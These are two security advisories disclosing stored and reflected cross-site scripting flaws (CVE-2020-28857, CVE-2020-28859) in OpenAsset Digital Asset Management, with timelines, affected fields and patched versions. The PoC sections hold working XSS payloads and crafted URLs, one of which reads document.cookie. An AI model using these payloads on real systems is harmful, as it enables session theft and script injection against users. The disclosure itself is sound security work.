Title: Stored cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28857

Author: Jack Misiura from The Missing Link 
Website: https://www.themissinglink.com.au


Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication

 

1. Vulnerability Description

The OpenAsset Digital Asset Management web application allowed for stored cross-site scripting attacks against various parameters and endpoints. Vulnerable parts of the web application include:

* System Preferences

              * Project Code regex field

              * User name regex field

              * Password regex field

              * All three description fields

              * First Album Name field

              * Visit Items Per SOAP request field

* Categories description

* Keywords, triggered on deletion attempts

* Editing photographer name

* Access token name

* Web share name

 

2. PoC

 

For system preferences fields, the following payloads can be used:

 

" autofocus onfocus="alert('Stored XSS');" abc="

"><script>alert("Script stored XSS");</script>

 

For categories description:

 

Category Name Goes Here<script>alert('Description stored XSS');</script>

 

For keywords:

 

Delete Me<script>alert(1234);</script>

 

Photographer name:

 

John Smith<script>alert("XSS Attack!");</script>

 

Access token name:

 

TokenName"><script>alert("Stored XSS Tokens")</script>

 

Web share name:

 

Share<script>alert("Stored XSS Web Share Name");</script>

 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.

 

4. Advisory URL

 

https://www.themissinglink.com.au/security-advisories

 

--------

Title: Reflected cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28859
 
Author: Jack Misiura from The Missing Link 
Website: https://www.themissinglink.com.au

Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication
 

1. Vulnerability Description

 

Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allows remote attackers to inject arbitrary JavaScript or HTML via:

* Account recovery/password reset page through the email parameter

* Saved search request, through the id parameter

* Search result request, through both the imageViewId and lpFilterInputId parameters

 

2. PoC

 

Account recovery:

https://example.com/Page/StartAccountRecovery?ok=1 <https://example.com/Page/StartAccountRecovery?ok=1&email=test%40test%3cscript%3ealert(document.cookie)%3c%2Fscript%3e.com> &email=test%40test<script>alert(document.cookie)<%2Fscript>.com

 

Saved search request:

https://example.com/AJAXPage/SavedSearch?id=167826 <https://example.com/AJAXPage/SavedSearch?id=167826%22')%3b%7d%3b%7d%5d%7d)%3b%3c/script%3e%3cscript%3ealert(%22Reflected%20XSS!%22)%3b%3c/script> "')%3b}%3b}]})%3b</script><script>alert("Reflected%20XSS!")%3b</script>

"');}}}]});alert(123);

 

Search result request:

https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript <https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert(%22more+xss+here%22)%3b%3c/script> >alert("more+xss+here")%3b</script>

 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.

 

4. Advisory URL

 

https://www.themissinglink.com.au/security-advisories